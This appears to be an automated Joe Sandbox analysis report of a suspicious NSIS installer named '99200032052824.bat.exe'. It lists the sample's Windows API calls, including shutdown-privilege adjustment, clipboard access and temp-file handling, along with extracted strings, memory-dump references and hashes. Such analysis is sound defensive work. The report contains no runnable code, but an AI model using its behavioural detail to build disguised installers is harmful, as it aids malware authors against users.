SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
GetCommandLineA.KERNEL32(Inquiring Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
CharNextA.USER32(00000000,"C:\Users\user\Desktop\99200032052824.bat.exe",00000020,"C:\Users\user\Desktop\99200032052824.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 0040331A
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

Part of subcall function 004037CE: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort,1033,Inquiring Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inquiring Setup: Installing,00000000,00000002,75A83410), ref: 004038BE
Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(Call), ref: 004038DC
Part of subcall function 004037CE: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort), ref: 00403925
Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962

Part of subcall function 004036F4: CloseHandle.KERNEL32(000002F4,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
ExitProcess.KERNEL32 ref: 0040354C
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
OpenProcessToken.ADVAPI32(00000000), ref: 00403670
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
ExitProcess.KERNEL32 ref: 004036EE

Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand, xrefs: 00403508
Inquiring Setup, xrefs: 004032D4
UXTHEME, xrefs: 0040325E, 00403263, 00403269
.tmp, xrefs: 00403573
Low, xrefs: 0040344A
SeShutdownPrivilege, xrefs: 00403682
\Temp, xrefs: 0040342E
", xrefs: 0040333F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort, xrefs: 004033FC, 004034FD, 004035A7, 004035B0
C:\Users\user\Desktop, xrefs: 0040357E, 00403583, 004035AF
~nsu, xrefs: 00403557
1033, xrefs: 00403478
NSIS Error, xrefs: 004032CF
C:\Users\user\Desktop\99200032052824.bat.exe, xrefs: 00403609
C:\Users\user\AppData\Local\Temp\, xrefs: 0040340C, 00403411, 00403427, 00403433, 00403442, 0040344F, 0040345B, 00403463, 0040355C, 0040356D, 00403578, 00403584, 00403591, 004035A0, 0040364F
TEMP, xrefs: 0040345C
TMP, xrefs: 00403464
"C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 004032E4, 004032EA, 004034A1
Error launching installer, xrefs: 004034E3

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\99200032052824.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand$C:\Users\user\Desktop$C:\Users\user\Desktop\99200032052824.bat.exe$Error launching installer$Inquiring Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-1469225168
Opcode ID: 9161ca9a5d85e359970b7cee058ae04b75de6ebf09e6b580f2889a559d4e6eb6
Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
Opcode Fuzzy Hash: 9161ca9a5d85e359970b7cee058ae04b75de6ebf09e6b580f2889a559d4e6eb6
Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

Function 00405205 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405264
GetDlgItem.USER32(?,000003EE), ref: 00405273
GetClientRect.USER32(?,?), ref: 004052B0
GetSystemMetrics.USER32(00000002), ref: 004052B7
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
ShowWindow.USER32(?,00000008), ref: 00405353
GetDlgItem.USER32(?,000003EC), ref: 00405374
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
GetDlgItem.USER32(?,000003F8), ref: 00405282

Part of subcall function 00404074: SendMessageA.USER32(00000028,?,?,00403EA4), ref: 00404082

GetDlgItem.USER32(?,000003EC), ref: 004053C5
CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053DA
ShowWindow.USER32(00000000), ref: 004053FD
ShowWindow.USER32(?,00000008), ref: 00405404
ShowWindow.USER32(00000008), ref: 0040544A
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
CreatePopupMenu.USER32 ref: 0040548F
AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054A4
GetWindowRect.USER32(?,000000FF), ref: 004054C4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
OpenClipboard.USER32(00000000), ref: 00405529
EmptyClipboard.USER32 ref: 0040552F
GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
GlobalLock.KERNEL32(00000000), ref: 00405542
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
GlobalUnlock.KERNEL32(00000000), ref: 0040556F
SetClipboardData.USER32(?,00000000), ref: 0040557A
CloseClipboard.USER32 ref: 00405580

Strings

Inquiring Setup: Installing, xrefs: 004054F5

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: Inquiring Setup: Installing
API String ID: 4154960007-1906667377
Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

Function 00405768 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
FindClose.KERNEL32(00000000), ref: 004058CF

Strings

\*.*, xrefs: 004057D3
C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
"C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00405768

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2991526125
Opcode ID: 7e912b2a9802e711fa8d749573897b654c7dd4461800a881f88780f975a2d178
Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
Opcode Fuzzy Hash: 7e912b2a9802e711fa8d749573897b654c7dd4461800a881f88780f975a2d178
Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69

Function 004020D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040851C,?,?,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand, xrefs: 00402193

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand
API String ID: 123533781-780878960
Opcode ID: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
Instruction ID: f4f88eda2e3132aa5920e2584167a74d80893369f9b2333c3bffcb98084fb778
Opcode Fuzzy Hash: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
Instruction Fuzzy Hash: 44510771A00208BFCB10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54

Function 004062A3 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(75A83410,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
FindClose.KERNEL32(00000000), ref: 004062BA

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

Function 00402340 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
Instruction ID: 8e029bd2b2674609338b614665d9252e3eb93026fbeeab8b0acd3e0b98e79a96
Opcode Fuzzy Hash: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
Instruction Fuzzy Hash: 2EE0803090430479DB10AFA18E0AEAD35649F41714F144839F5507B0D1EEB544419B3D

Function 00403B6B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
ShowWindow.USER32(?), ref: 00403BC4
DestroyWindow.USER32 ref: 00403BD8
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
GetDlgItem.USER32(?,?), ref: 00403C15
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
IsWindowEnabled.USER32(00000000), ref: 00403C30
GetDlgItem.USER32(?,?), ref: 00403CDE
GetDlgItem.USER32(?,00000002), ref: 00403CE8
SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D53
GetDlgItem.USER32(?,00000003), ref: 00403DF9
ShowWindow.USER32(00000000,?), ref: 00403E1A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
EnableWindow.USER32(?,?), ref: 00403E47
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E5D
EnableMenuItem.USER32(00000000), ref: 00403E64
SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E7C
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
lstrlenA.KERNEL32(Inquiring Setup: Installing,?,Inquiring Setup: Installing,00000000), ref: 00403EB9
SetWindowTextA.USER32(?,Inquiring Setup: Installing), ref: 00403EC8
ShowWindow.USER32(?,0000000A), ref: 00403FFC

Strings

Inquiring Setup: Installing, xrefs: 00403EA9, 00403EAF, 00403EB8, 00403EC6

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Inquiring Setup: Installing
API String ID: 3282139019-1906667377
Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

Function 004037CE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365

lstrcatA.KERNEL32(1033,Inquiring Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inquiring Setup: Installing,00000000,00000002,75A83410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\99200032052824.bat.exe",00000000), ref: 00403849
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort,1033,Inquiring Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inquiring Setup: Installing,00000000,00000002,75A83410), ref: 004038BE
lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
GetFileAttributesA.KERNEL32(Call), ref: 004038DC
LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort), ref: 00403925

Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B

RegisterClassA.USER32(0042EBA0), ref: 00403962
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
ShowWindow.USER32(00000005,00000000), ref: 004039E5
GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
RegisterClassA.USER32(0042EBA0), ref: 00403A27
DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46

Strings

_Nb, xrefs: 00403941, 004039A9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort, xrefs: 00403858, 00403860, 004038F8, 004038FE, 0040390E
.exe, xrefs: 004038CB
RichEd32, xrefs: 004039F9
.DEFAULT\Control Panel\International, xrefs: 00403834
Call, xrefs: 0040388C, 00403894, 004038A1, 004038EB, 004038F1
1033, xrefs: 004037EE, 00403844
Inquiring Setup: Installing, xrefs: 004037FA, 00403800, 00403825, 0040382E, 00403843
Control Panel\Desktop\ResourceLocale, xrefs: 00403802
RichEd20, xrefs: 004039EB
C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3
"C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 004037D2
RichEdit, xrefs: 00403A18
RichEdit20A, xrefs: 00403A09, 00403A0F

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$Call$Control Panel\Desktop\ResourceLocale$Inquiring Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-528757914
Opcode ID: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
Opcode Fuzzy Hash: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\99200032052824.bat.exe,00000400), ref: 00402D90

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\99200032052824.bat.exe,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00402DDC

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
C:\Users\user\Desktop\99200032052824.bat.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
